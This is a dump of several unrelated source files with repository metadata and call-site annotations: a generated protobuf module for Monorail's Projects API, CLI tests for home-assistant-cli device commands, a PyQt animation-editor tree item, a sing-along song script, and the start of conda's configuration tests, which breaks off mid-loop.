serialized_start=1170, serialized_end=1817, methods=[ _descriptor.MethodDescriptor( name='CreateFieldDef', full_name='monorail.v3.Projects.CreateFieldDef', index=0, containing_service=None, input_type=_CREATEFIELDDEFREQUEST, output_type=api_dot_v3_dot_api__proto_dot_project__objects__pb2._FIELDDEF, serialized_options=None, create_key=_descriptor._internal_create_key, ), _descriptor.MethodDescriptor( name='GetComponentDef', full_name='monorail.v3.Projects.GetComponentDef', index=1, containing_service=None, input_type=_GETCOMPONENTDEFREQUEST, output_type=api_dot_v3_dot_api__proto_dot_project__objects__pb2._COMPONENTDEF, serialized_options=None, create_key=_descriptor._internal_create_key, ), _descriptor.MethodDescriptor( name='CreateComponentDef', full_name='monorail.v3.Projects.CreateComponentDef', index=2, containing_service=None, input_type=_CREATECOMPONENTDEFREQUEST, output_type=api_dot_v3_dot_api__proto_dot_project__objects__pb2._COMPONENTDEF, serialized_options=None, create_key=_descriptor._internal_create_key, ), _descriptor.MethodDescriptor( name='DeleteComponentDef', full_name='monorail.v3.Projects.DeleteComponentDef', index=3, containing_service=None, input_type=_DELETECOMPONENTDEFREQUEST, output_type=google_dot_protobuf_dot_empty__pb2._EMPTY, serialized_options=None, create_key=_descriptor._internal_create_key, ), _descriptor.MethodDescriptor( name='ListIssueTemplates', full_name='monorail.v3.Projects.ListIssueTemplates', index=4, containing_service=None, input_type=_LISTISSUETEMPLATESREQUEST, output_type=_LISTISSUETEMPLATESRESPONSE, serialized_options=None, create_key=_descriptor._internal_create_key, ), _descriptor.MethodDescriptor( name='ListComponentDefs', full_name='monorail.v3.Projects.ListComponentDefs', index=5, containing_service=None, input_type=_LISTCOMPONENTDEFSREQUEST, 
output_type=_LISTCOMPONENTDEFSRESPONSE, serialized_options=None, create_key=_descriptor._internal_create_key, ), _descriptor.MethodDescriptor( name='ListProjects', full_name='monorail.v3.Projects.ListProjects', index=6, containing_service=None, input_type=_LISTPROJECTSREQUEST, output_type=_LISTPROJECTSRESPONSE, serialized_options=None, create_key=_descriptor._internal_create_key, ), ]) _sym_db.RegisterServiceDescriptor(_PROJECTS) DESCRIPTOR.services_by_name['Projects'] = _PROJECTS # @@protoc_insertion_point(module_scope)
[((11, 10, 11, 36), 'google.protobuf.symbol_database.Default', '_symbol_database.Default', ({}, {}), '()', True, 'from google.protobuf import symbol_database as _symbol_database\n'), ((20, 13, 28, 222), 'google.protobuf.descriptor.FileDescriptor', '_descriptor.FileDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n'), ((439, 24, 443, 4), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', ({(439, 65, 439, 88): '"""CreateFieldDefRequest"""', (439, 90, 439, 109): '(_message.Message,)', (439, 111, 443, 3): "{'DESCRIPTOR': _CREATEFIELDDEFREQUEST, '__module__':\n 'api.v3.api_proto.projects_pb2'}"}, {}), "('CreateFieldDefRequest', (_message\n .Message,), {'DESCRIPTOR': _CREATEFIELDDEFREQUEST, '__module__':\n 'api.v3.api_proto.projects_pb2'})", True, 'from google.protobuf import reflection as _reflection\n'), ((446, 25, 450, 4), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', ({(446, 66, 446, 90): '"""GetComponentDefRequest"""', (446, 92, 446, 111): '(_message.Message,)', (446, 113, 450, 3): "{'DESCRIPTOR': _GETCOMPONENTDEFREQUEST, '__module__':\n 'api.v3.api_proto.projects_pb2'}"}, {}), "('GetComponentDefRequest', (\n _message.Message,), {'DESCRIPTOR': _GETCOMPONENTDEFREQUEST,\n '__module__': 'api.v3.api_proto.projects_pb2'})", True, 'from google.protobuf import reflection as _reflection\n'), ((453, 28, 457, 4), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', ({(453, 69, 453, 96): '"""CreateComponentDefRequest"""', (453, 98, 453, 117): '(_message.Message,)', (453, 119, 457, 3): "{'DESCRIPTOR': _CREATECOMPONENTDEFREQUEST, '__module__':\n 'api.v3.api_proto.projects_pb2'}"}, {}), "('CreateComponentDefRequest', (\n _message.Message,), {'DESCRIPTOR': _CREATECOMPONENTDEFREQUEST,\n '__module__': 'api.v3.api_proto.projects_pb2'})", True, 'from google.protobuf import reflection as _reflection\n'), ((460, 28, 464, 4), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', ({(460, 69, 460, 96): '"""DeleteComponentDefRequest"""', (460, 98, 460, 117): '(_message.Message,)', (460, 119, 464, 3): "{'DESCRIPTOR': _DELETECOMPONENTDEFREQUEST, '__module__':\n 'api.v3.api_proto.projects_pb2'}"}, {}), "('DeleteComponentDefRequest', (\n _message.Message,), {'DESCRIPTOR': _DELETECOMPONENTDEFREQUEST,\n '__module__': 'api.v3.api_proto.projects_pb2'})", True, 'from google.protobuf import reflection as _reflection\n'), ((467, 28, 471, 4), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', ({(467, 69, 467, 96): '"""ListIssueTemplatesRequest"""', (467, 98, 467, 117): '(_message.Message,)', (467, 119, 471, 3): "{'DESCRIPTOR': _LISTISSUETEMPLATESREQUEST, '__module__':\n 'api.v3.api_proto.projects_pb2'}"}, {}), "('ListIssueTemplatesRequest', (\n _message.Message,), {'DESCRIPTOR': _LISTISSUETEMPLATESREQUEST,\n '__module__': 'api.v3.api_proto.projects_pb2'})", True, 'from google.protobuf import reflection as _reflection\n'), ((474, 29, 478, 4), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', ({(474, 70, 474, 98): '"""ListIssueTemplatesResponse"""', (474, 100, 474, 119): '(_message.Message,)', (474, 121, 478, 3): "{'DESCRIPTOR': _LISTISSUETEMPLATESRESPONSE, '__module__':\n 'api.v3.api_proto.projects_pb2'}"}, {}), "('ListIssueTemplatesResponse', (\n _message.Message,), {'DESCRIPTOR': 
_LISTISSUETEMPLATESRESPONSE,\n '__module__': 'api.v3.api_proto.projects_pb2'})", True, 'from google.protobuf import reflection as _reflection\n'), ((481, 27, 485, 4), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', ({(481, 68, 481, 94): '"""ListComponentDefsRequest"""', (481, 96, 481, 115): '(_message.Message,)', (481, 117, 485, 3): "{'DESCRIPTOR': _LISTCOMPONENTDEFSREQUEST, '__module__':\n 'api.v3.api_proto.projects_pb2'}"}, {}), "('ListComponentDefsRequest', (\n _message.Message,), {'DESCRIPTOR': _LISTCOMPONENTDEFSREQUEST,\n '__module__': 'api.v3.api_proto.projects_pb2'})", True, 'from google.protobuf import reflection as _reflection\n'), ((488, 28, 492, 4), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', ({(488, 69, 488, 96): '"""ListComponentDefsResponse"""', (488, 98, 488, 117): '(_message.Message,)', (488, 119, 492, 3): "{'DESCRIPTOR': _LISTCOMPONENTDEFSRESPONSE, '__module__':\n 'api.v3.api_proto.projects_pb2'}"}, {}), "('ListComponentDefsResponse', (\n _message.Message,), {'DESCRIPTOR': _LISTCOMPONENTDEFSRESPONSE,\n '__module__': 'api.v3.api_proto.projects_pb2'})", True, 'from google.protobuf import reflection as _reflection\n'), ((495, 22, 499, 4), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', ({(495, 63, 495, 84): '"""ListProjectsRequest"""', (495, 86, 495, 105): '(_message.Message,)', (495, 107, 499, 3): "{'DESCRIPTOR': _LISTPROJECTSREQUEST, '__module__':\n 'api.v3.api_proto.projects_pb2'}"}, {}), "('ListProjectsRequest', (_message.\n Message,), {'DESCRIPTOR': _LISTPROJECTSREQUEST, '__module__':\n 'api.v3.api_proto.projects_pb2'})", True, 'from google.protobuf import reflection as _reflection\n'), ((502, 23, 506, 4), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', ({(502, 64, 502, 86): '"""ListProjectsResponse"""', (502, 88, 502, 107): '(_message.Message,)', (502, 109, 506, 3): "{'DESCRIPTOR': _LISTPROJECTSRESPONSE, '__module__':\n 'api.v3.api_proto.projects_pb2'}"}, {}), "('ListProjectsResponse', (_message.\n Message,), {'DESCRIPTOR': _LISTPROJECTSRESPONSE, '__module__':\n 'api.v3.api_proto.projects_pb2'})", True, 'from google.protobuf import reflection as _reflection\n'), ((48, 4, 54, 101), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n'), ((119, 4, 125, 101), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n'), ((190, 4, 196, 93), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n'), ((229, 4, 235, 93), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n'), ((275, 4, 281, 93), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n'), ((314, 4, 320, 93), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n'), ((353, 4, 359, 93), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n'), ((392, 4, 398, 
93), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n'), ((530, 2, 539, 3), 'google.protobuf.descriptor.MethodDescriptor', '_descriptor.MethodDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n'), ((540, 2, 549, 3), 'google.protobuf.descriptor.MethodDescriptor', '_descriptor.MethodDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n'), ((550, 2, 559, 3), 'google.protobuf.descriptor.MethodDescriptor', '_descriptor.MethodDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n'), ((560, 2, 569, 3), 'google.protobuf.descriptor.MethodDescriptor', '_descriptor.MethodDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n'), ((570, 2, 579, 3), 'google.protobuf.descriptor.MethodDescriptor', '_descriptor.MethodDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n'), ((580, 2, 589, 3), 'google.protobuf.descriptor.MethodDescriptor', '_descriptor.MethodDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n'), ((590, 2, 599, 3), 'google.protobuf.descriptor.MethodDescriptor', '_descriptor.MethodDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n')]
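# The generated projects_pb2 module above only registers message classes and a
# service descriptor; it ships no client logic of its own. Below is a minimal,
# illustrative sketch (not part of the generated file) of building one of its
# request messages and round-tripping it through serialization. It assumes the
# package root is on the import path so `api.v3.api_proto` resolves.
from api.v3.api_proto import projects_pb2


def build_list_projects_request(page_size=100, page_token=''):
    """Construct a ListProjectsRequest and verify it survives a round trip."""
    request = projects_pb2.ListProjectsRequest(
        page_size=page_size,
        page_token=page_token,
    )
    payload = request.SerializeToString()  # standard protobuf wire bytes
    parsed = projects_pb2.ListProjectsRequest.FromString(payload)
    assert parsed.page_size == page_size
    return parsed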
michaelwoods/home-assistant-cli
tests/test_device.py
340643af943f36283621f39ac39a690b1fccc045
"""Testing Device operations.""" import json import unittest.mock as mock from click.testing import CliRunner import homeassistant_cli.cli as cli def test_device_list(default_devices) -> None: """Test Device List.""" with mock.patch( 'homeassistant_cli.remote.get_devices', return_value=default_devices ): runner = CliRunner() result = runner.invoke( cli.cli, ["--output=json", "device", "list"], catch_exceptions=False, ) assert result.exit_code == 0 data = json.loads(result.output) assert len(data) == 23 def test_device_list_filter(default_devices) -> None: """Test Device List.""" with mock.patch( 'homeassistant_cli.remote.get_devices', return_value=default_devices ): runner = CliRunner() result = runner.invoke( cli.cli, ["--output=json", "device", "list", "table"], catch_exceptions=False, ) assert result.exit_code == 0 data = json.loads(result.output) assert len(data) == 2 assert data[0]['name'] == "Kitchen table left" assert data[1]['name'] == "Kitchen table right" def test_device_assign(default_areas, default_devices) -> None: """Test basic device assign.""" with mock.patch( 'homeassistant_cli.remote.get_devices', return_value=default_devices ): with mock.patch( 'homeassistant_cli.remote.get_areas', return_value=default_areas ): with mock.patch( 'homeassistant_cli.remote.assign_area', return_value={'success': True}, ): runner = CliRunner() result = runner.invoke( cli.cli, ["device", "assign", "Kitchen", "Kitchen table left"], catch_exceptions=False, ) print(result.output) assert result.exit_code == 0 expected = ( "Successfully assigned 'Kitchen'" " to 'Kitchen table left'\n" ) assert result.output == expected
[((12, 9, 14, 5), 'unittest.mock.patch', 'mock.patch', (), '', True, 'import unittest.mock as mock\n'), ((16, 17, 16, 28), 'click.testing.CliRunner', 'CliRunner', ({}, {}), '()', False, 'from click.testing import CliRunner\n'), ((24, 15, 24, 40), 'json.loads', 'json.loads', ({(24, 26, 24, 39): 'result.output'}, {}), '(result.output)', False, 'import json\n'), ((30, 9, 32, 5), 'unittest.mock.patch', 'mock.patch', (), '', True, 'import unittest.mock as mock\n'), ((34, 17, 34, 28), 'click.testing.CliRunner', 'CliRunner', ({}, {}), '()', False, 'from click.testing import CliRunner\n'), ((42, 15, 42, 40), 'json.loads', 'json.loads', ({(42, 26, 42, 39): 'result.output'}, {}), '(result.output)', False, 'import json\n'), ((50, 9, 52, 5), 'unittest.mock.patch', 'mock.patch', (), '', True, 'import unittest.mock as mock\n'), ((53, 13, 55, 9), 'unittest.mock.patch', 'mock.patch', (), '', True, 'import unittest.mock as mock\n'), ((56, 17, 59, 13), 'unittest.mock.patch', 'mock.patch', (), '', True, 'import unittest.mock as mock\n'), ((61, 25, 61, 36), 'click.testing.CliRunner', 'CliRunner', ({}, {}), '()', False, 'from click.testing import CliRunner\n')]
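# The three tests above share one recipe: patch the helper in
# homeassistant_cli.remote, drive the CLI through click's CliRunner, then
# assert on the exit code and the JSON output. The sketch below applies that
# same recipe to one more hypothetical check (it reuses the suite's
# `default_devices` fixture and is illustrative, not part of test_device.py).
import json
import unittest.mock as mock

from click.testing import CliRunner

import homeassistant_cli.cli as cli


def test_device_list_has_names(default_devices) -> None:
    """Sketch: every device returned by `device list` should carry a name."""
    with mock.patch(
        'homeassistant_cli.remote.get_devices', return_value=default_devices
    ):
        runner = CliRunner()
        result = runner.invoke(
            cli.cli,
            ["--output=json", "device", "list"],
            catch_exceptions=False,
        )
        assert result.exit_code == 0
        data = json.loads(result.output)
        assert all('name' in device for device in data)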
tarsa129/j3d-animation-editor
widgets/tree_item.py
3f0691bd7dcece6e2055a0b5af0510608f28f2ca
from PyQt5.QtWidgets import QAction, QTreeWidget, QTreeWidgetItem, QFileDialog
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import Qt

import animations.general_animation as j3d
from widgets.yaz0 import compress, compress_slow, compress_fast
from io import BytesIO


class tree_item(QTreeWidgetItem):
    def __init__(self, parent):
        QTreeWidgetItem.__init__(self, parent, 1000)
        self.display_info = []
        self.filepath = ""
        self.compressed = 1
        self.bmd_file = None
        self.sound_data = None
        self.changed = False

    def set_values(self, display_info, filepath, compressed):
        self.display_info = display_info
        self.filepath = filepath.replace("|", ".")
        self.compressed = compressed

        forward_i = filepath.rfind("/") + 1
        backwad_i = filepath.rfind("\\") + 1

        self.setText(0, self.filepath[max(forward_i, backwad_i):])

    def set_sound(self, sound_data):
        self.sound_data = sound_data
        if sound_data is not None:
            icon = QIcon("icons/sound.png")
            self.setIcon(0, icon)
        else:
            self.setIcon(0, QIcon())

    def save_animation(self, other_filepath="", compress_dis=1, save_all=False):
        if save_all and not self.changed:
            print("skipping " + self.filepath + " because nothing has changed")
            return

        if other_filepath != "":
            working_filepath = other_filepath
        else:
            working_filepath = self.filepath

        if working_filepath.endswith("a") and not working_filepath.endswith(".bva"):
            info = j3d.fix_array(self.display_info)
            self.convert_to_a(info)
        else:
            info = j3d.fix_array(self.display_info)
            j3d.sort_filepath(working_filepath, info, self.sound_data)

        compress_status = self.compressed
        if compress_dis != 0:
            compress_status = compress_dis
        print(compress_status)

        if compress_status > 1:
            out = BytesIO()
            with open(working_filepath, "rb") as f:
                if compress_status == 2:
                    out = compress_fast(f)
                elif compress_status == 3:
                    out = compress(f)
                elif compress_status == 4:
                    out = compress_slow(f)
            with open(working_filepath, "wb") as f:
                f.write(out.getbuffer())

        self.changed = False

    def convert_to_k(self):
        filepath = self.filepath[:-1] + "k"
        info = j3d.fix_array(self.display_info)
        if self.filepath.endswith(".bca"):
            bck = j3d.sort_filepath(filepath, info)
        elif filepath.endswith(".bla"):
            blk = j3d.sort_filepath(filepath, info)

    def convert_to_a(self, info):
        info = j3d.fix_array(info)
        if self.filepath.endswith(".bck") or self.filepath.endswith(".bca"):
            bca = j3d.convert_to_a(self.filepath, info)  # this is a pure bck, no saving
            filepath = self.filepath[:-1] + "a"
            with open(filepath, "wb") as f:
                bca.write_bca(f)
                f.close()
        elif self.filepath.endswith(".blk") or self.filepath.endswith(".bla"):
            bla = j3d.convert_to_a(self.filepath, info)  # this is a pure bck, no saving
            filepath = self.filepath[:-1] + "a"
            with open(filepath, "wb") as f:
                bla.write_bla(f)
                f.close()

    def export_anim(self):
        info = j3d.fix_array(self.display_info)
        filepath = self.filepath[0:-4] + ".anim"
        if self.bmd_file is None:
            bmd_file, choosentype = QFileDialog.getOpenFileName(None, "Open File", "", "Model files (*.bmd *.bdl)")
            if bmd_file:
                bck = j3d.export_anim(filepath, info, bmd_file)
        else:
            bck = j3d.export_anim(filepath, info, self.bmd_file)

    def add_children(self, strings):
        self.takeChildren()
        for name in strings:
            child = QTreeWidgetItem(self)
            child.setText(0, name)
            child.setDisabled(True)
[((10, 8, 10, 51), 'PyQt5.QtWidgets.QTreeWidgetItem.__init__', 'QTreeWidgetItem.__init__', ({(10, 33, 10, 37): 'self', (10, 39, 10, 45): 'parent', (10, 46, 10, 50): '(1000)'}, {}), '(self, parent, 1000)', False, 'from PyQt5.QtWidgets import QAction, QTreeWidget, QTreeWidgetItem, QFileDialog\n'), ((73, 15, 73, 47), 'animations.general_animation.fix_array', 'j3d.fix_array', ({(73, 29, 73, 46): 'self.display_info'}, {}), '(self.display_info)', True, 'import animations.general_animation as j3d\n'), ((81, 15, 81, 36), 'animations.general_animation.fix_array', 'j3d.fix_array', ({(81, 30, 81, 34): 'info'}, {}), '(info)', True, 'import animations.general_animation as j3d\n'), ((101, 15, 101, 47), 'animations.general_animation.fix_array', 'j3d.fix_array', ({(101, 29, 101, 46): 'self.display_info'}, {}), '(self.display_info)', True, 'import animations.general_animation as j3d\n'), ((33, 19, 33, 43), 'PyQt5.QtGui.QIcon', 'QIcon', ({(33, 25, 33, 42): '"""icons/sound.png"""'}, {}), "('icons/sound.png')", False, 'from PyQt5.QtGui import QIcon\n'), ((49, 19, 49, 52), 'animations.general_animation.fix_array', 'j3d.fix_array', ({(49, 34, 49, 51): 'self.display_info'}, {}), '(self.display_info)', True, 'import animations.general_animation as j3d\n'), ((52, 19, 52, 52), 'animations.general_animation.fix_array', 'j3d.fix_array', ({(52, 34, 52, 51): 'self.display_info'}, {}), '(self.display_info)', True, 'import animations.general_animation as j3d\n'), ((53, 12, 53, 70), 'animations.general_animation.sort_filepath', 'j3d.sort_filepath', ({(53, 30, 53, 46): 'working_filepath', (53, 48, 53, 52): 'info', (53, 54, 53, 69): 'self.sound_data'}, {}), '(working_filepath, info, self.sound_data)', True, 'import animations.general_animation as j3d\n'), ((60, 18, 60, 27), 'io.BytesIO', 'BytesIO', ({}, {}), '()', False, 'from io import BytesIO\n'), ((75, 18, 75, 51), 'animations.general_animation.sort_filepath', 'j3d.sort_filepath', ({(75, 36, 75, 44): 'filepath', (75, 46, 75, 50): 'info'}, {}), '(filepath, info)', True, 'import animations.general_animation as j3d\n'), ((86, 18, 86, 55), 'animations.general_animation.convert_to_a', 'j3d.convert_to_a', ({(86, 35, 86, 48): 'self.filepath', (86, 50, 86, 54): 'info'}, {}), '(self.filepath, info)', True, 'import animations.general_animation as j3d\n'), ((104, 36, 104, 116), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', ({(104, 65, 104, 69): 'None', (104, 71, 104, 82): '"""Open File"""', (104, 83, 104, 85): '""""""', (104, 88, 104, 115): '"""Model files (*.bmd *.bdl)"""'}, {}), "(None, 'Open File', '', 'Model files (*.bmd *.bdl)')", False, 'from PyQt5.QtWidgets import QAction, QTreeWidget, QTreeWidgetItem, QFileDialog\n'), ((109, 18, 109, 64), 'animations.general_animation.export_anim', 'j3d.export_anim', ({(109, 34, 109, 42): 'filepath', (109, 44, 109, 48): 'info', (109, 50, 109, 63): 'self.bmd_file'}, {}), '(filepath, info, self.bmd_file)', True, 'import animations.general_animation as j3d\n'), ((114, 20, 114, 41), 'PyQt5.QtWidgets.QTreeWidgetItem', 'QTreeWidgetItem', ({(114, 36, 114, 40): 'self'}, {}), '(self)', False, 'from PyQt5.QtWidgets import QAction, QTreeWidget, QTreeWidgetItem, QFileDialog\n'), ((36, 28, 36, 35), 'PyQt5.QtGui.QIcon', 'QIcon', ({}, {}), '()', False, 'from PyQt5.QtGui import QIcon\n'), ((77, 18, 77, 51), 'animations.general_animation.sort_filepath', 'j3d.sort_filepath', ({(77, 36, 77, 44): 'filepath', (77, 46, 77, 50): 'info'}, {}), '(filepath, info)', True, 'import animations.general_animation as j3d\n'), ((94, 18, 94, 
55), 'animations.general_animation.convert_to_a', 'j3d.convert_to_a', ({(94, 35, 94, 48): 'self.filepath', (94, 50, 94, 54): 'info'}, {}), '(self.filepath, info)', True, 'import animations.general_animation as j3d\n'), ((107, 22, 107, 63), 'animations.general_animation.export_anim', 'j3d.export_anim', ({(107, 38, 107, 46): 'filepath', (107, 48, 107, 52): 'info', (107, 54, 107, 62): 'bmd_file'}, {}), '(filepath, info, bmd_file)', True, 'import animations.general_animation as j3d\n'), ((63, 26, 63, 42), 'widgets.yaz0.compress_fast', 'compress_fast', ({(63, 40, 63, 41): 'f'}, {}), '(f)', False, 'from widgets.yaz0 import compress, compress_slow, compress_fast\n'), ((65, 26, 65, 37), 'widgets.yaz0.compress', 'compress', ({(65, 35, 65, 36): 'f'}, {}), '(f)', False, 'from widgets.yaz0 import compress, compress_slow, compress_fast\n'), ((67, 26, 67, 42), 'widgets.yaz0.compress_slow', 'compress_slow', ({(67, 40, 67, 41): 'f'}, {}), '(f)', False, 'from widgets.yaz0 import compress, compress_slow, compress_fast\n')]
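# tree_item above is a QTreeWidgetItem subclass (custom item type 1000) whose
# state is populated through set_values()/set_sound() rather than __init__.
# A minimal usage sketch follows; it assumes a running QApplication, and the
# file path and child label are made up for illustration. compressed=1 means
# "store uncompressed" (save_animation only yaz0-compresses for values > 1).
import sys

from PyQt5.QtWidgets import QApplication, QTreeWidget

from widgets.tree_item import tree_item

app = QApplication(sys.argv)
tree = QTreeWidget()

item = tree_item(tree)                           # parented straight to the tree widget
item.set_values([], "animations/sample.bck", 1)  # hypothetical animation path
item.set_sound(None)                             # no attached sound -> blank icon
item.add_children(["frame info not loaded"])     # greyed-out placeholder row

tree.show()
sys.exit(app.exec_())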
edhosken/WheelsSong
Wheels.py
cb988c8510a1095eeec3a2399b0fc0ba24bfa648
#Create the pre-defined song values and empty variables...Correct names not used so each starting letter would be unique
numbers = (1 ,2 ,3 ,4 ,5 ,6 ,7 ,8 ,9 ,10 ,11 ,12 ,13 ,14 ,15 ,16 ,17 ,18 )
letters = ['a ','b ','c ','d ','e ','f ','g ','h ','i ','j ','k ','l ','m ','n ','o ','p ','q ','r ']
roman = ['I ', 'II ', 'III ', 'IV ', 'V ', 'VI ', 'VII ', 'VIII ', 'IX ', 'X ', 'XI ', 'XII ', 'XIII ', 'XIV ', 'XV ', 'XVI ', 'XVII ', 'XVIII']
military = ['alpha ', 'bravo ', 'charlie ', 'delta ', 'echo ', 'foxtrot ', 'golf ', 'hotel ', 'india ', 'juliet ', 'kilo ', 'lima ', 'mike ', 'november ', 'oscar ', 'papa ', 'quebec ', 'romeo ']
german = ['eins', 'zwei', 'drei', 'vier', 'fünf', 'sechs', 'sieben', 'acht', 'neun', 'zehn', 'elf', 'zwölf', 'dreizehn', 'vierzehn', 'fünfzehn', 'sechzehn', 'siebzehn', 'achtzehn']
pi = ['3 ','point ','1 ','4 ','1 ','5 ','9 ','2 ','6 ','5 ','3 ','5 ','8 ','9 ','7 ','9 ','3 ','2 ']

##Build morse code sequences
t = 'dot'
s = 'dash'
m1 = t, s, s, s, s
m2 = t, t, s, s, s
m3 = t, t, t, s, s
m4 = t, t, t, t, s
m5 = t, t, t, t, t
m6 = s, t, t, t, t
m7 = s, s, t, t, t
m8 = s, s, s, t, t
m9 = s, s, s, s, t
m0 = s, s, s, s, s

code = [m1, m2, m3, m4, m5, m6, m7, m8, m9, m1 + m0, m1 + m1, m1 + m2, m1 + m3, m1 + m4, m1 + m5, m1 + m6, m1 + m7, m1 + m8]

##Other ideas: piglatin, japanese, spanish, prime, tau, e, ...

##NEED TO ADD INVALID ENTRY CATCHES
print("Hello, let's sing a song that everybody loves!\n")

sing = 'y'
while sing == 'y':
    user = []
    variation = input ("Please input what variation you wish to perform by entering 'numbers', 'letters', 'roman', 'military', 'pi', 'german', 'code', or 'user' to make your own song: \n").lower().strip()

    ##Seemingly silly switching of strings to list types
    if variation == "numbers" or variation == "n":
        variation = numbers
    elif variation == "letters" or variation == "l":
        variation = letters
    elif variation == "roman" or variation == "r":
        variation = roman
    elif variation == "military" or variation == "m":
        variation = military
    elif variation == "pi" or variation == "p":
        variation = pi
    elif variation == "german" or variation == "g":
        variation = german
    elif variation == "code" or variation == "c":
        variation = code
    elif variation == "user" or variation == "u":
        while len(user) < 18:
            user.append(input ("Enter a word: "))
        variation = user

    #User input to select the song pattern
    pattern = input ("\nNow please tell me what pattern to use by entering 'forward', 'backward', 'even', or 'odd':\n")
    print ("\nHere we go: \n\n")

    #Assemble the song...IMPROVE FORMAT SO OUTPUT IS EASIER TO READ
    song1 = "Oh, there are "
    song2 = " wheels on a big rig truck!"
    a = song1, variation[::], song2
    b = song1, variation[::-1], song2
    c = song1, variation[::2], song2
    d = song1, variation[1::2], song2

    ##Use pattern.startswith()?...Also, might be better to separate forward/backward and even/odd choices.
    if pattern == 'forward' or pattern == 'f':
        print (a)
    elif pattern == 'backward' or pattern == 'b':
        print (b)
    elif pattern == 'odd' or pattern == 'o':
        print (c)
    elif pattern == 'even' or pattern == 'e':
        print (d)

    sing = input('\n\nWould you like to sing it again? (y/n) ').lower()

## This is the end of the while loop
else:
    print ("\nOK, Goodbye!")
[]
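# Wheels.py above selects its verses with raw slices: variation[::], [::-1],
# [::2], and [1::2]. The stand-alone sketch below is an illustrative refactor
# of that idea (not code from the script): the slices live in one table and
# the chosen items are joined into a single readable line.
PATTERNS = {
    'forward': slice(None, None, 1),    # every wheel, in order
    'backward': slice(None, None, -1),  # reversed
    'odd': slice(0, None, 2),           # positions holding 1, 3, 5, ...
    'even': slice(1, None, 2),          # positions holding 2, 4, 6, ...
}


def sing_verse(values, pattern='forward'):
    """Return one verse of the song for the chosen slice pattern."""
    chosen = values[PATTERNS[pattern]]
    middle = ' '.join(str(v).strip() for v in chosen)
    return "Oh, there are " + middle + " wheels on a big rig truck!"


print(sing_verse(list(range(1, 19)), 'backward'))
# -> Oh, there are 18 17 16 ... 2 1 wheels on a big rig truck!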
dfroger/conda
tests/test_config.py
c0f99ff46b217d081501e66f4dcd7bcdb5d9c6aa
# (c) 2012-2014 Continuum Analytics, Inc. / http://continuum.io # All Rights Reserved # # conda is distributed under the terms of the BSD 3-clause license. # Consult LICENSE.txt or http://opensource.org/licenses/BSD-3-Clause. import os from os.path import dirname, join, exists import unittest import pytest import conda.config as config from conda.utils import get_yaml from conda.compat import iterkeys from tests.helpers import run_conda_command yaml = get_yaml() # use condarc from source tree to run these tests against config.rc_path = join(dirname(__file__), 'condarc') def _get_default_urls(): return ['http://repo.continuum.io/pkgs/free', 'http://repo.continuum.io/pkgs/pro'] config.get_default_urls = _get_default_urls # unset CIO_TEST. This is a Continuum-internal variable that draws packages from an internal server instead of # repo.continuum.io try: del os.environ['CIO_TEST'] except KeyError: pass class TestConfig(unittest.TestCase): # These tests are mostly to ensure API stability def __init__(self, *args, **kwargs): config.rc = config.load_condarc(config.rc_path) # Otherwise normalization tests will fail if the user is logged into # binstar. config.rc['add_binstar_token'] = False super(TestConfig, self).__init__(*args, **kwargs) def test_globals(self): self.assertTrue(config.root_dir) self.assertTrue(config.pkgs_dirs) self.assertTrue(config.envs_dirs) self.assertTrue(config.default_prefix) self.assertTrue(config.platform) self.assertTrue(config.subdir) self.assertTrue(config.arch_name) self.assertTrue(config.bits in (32, 64)) def test_pkgs_dir_from_envs_dir(self): root_dir = config.root_dir root_pkgs = join(root_dir, 'pkgs') for pi, po in [ (join(root_dir, 'envs'), root_pkgs), ('/usr/local/foo/envs' if config.platform != 'win' else 'C:\envs', '/usr/local/foo/envs/.pkgs' if config.platform != 'win' else 'C:\envs\.pkgs'), ]: self.assertEqual(config.pkgs_dir_from_envs_dir(pi), po) def test_proxy_settings(self): self.assertEqual(config.get_proxy_servers(), {'http': 'http://user:[email protected]:8080', 'https': 'https://user:[email protected]:8080'}) def test_normalize_urls(self): current_platform = config.subdir assert config.DEFAULT_CHANNEL_ALIAS == 'https://conda.anaconda.org/' assert config.rc.get('channel_alias') == 'https://your.repo/' for channel in 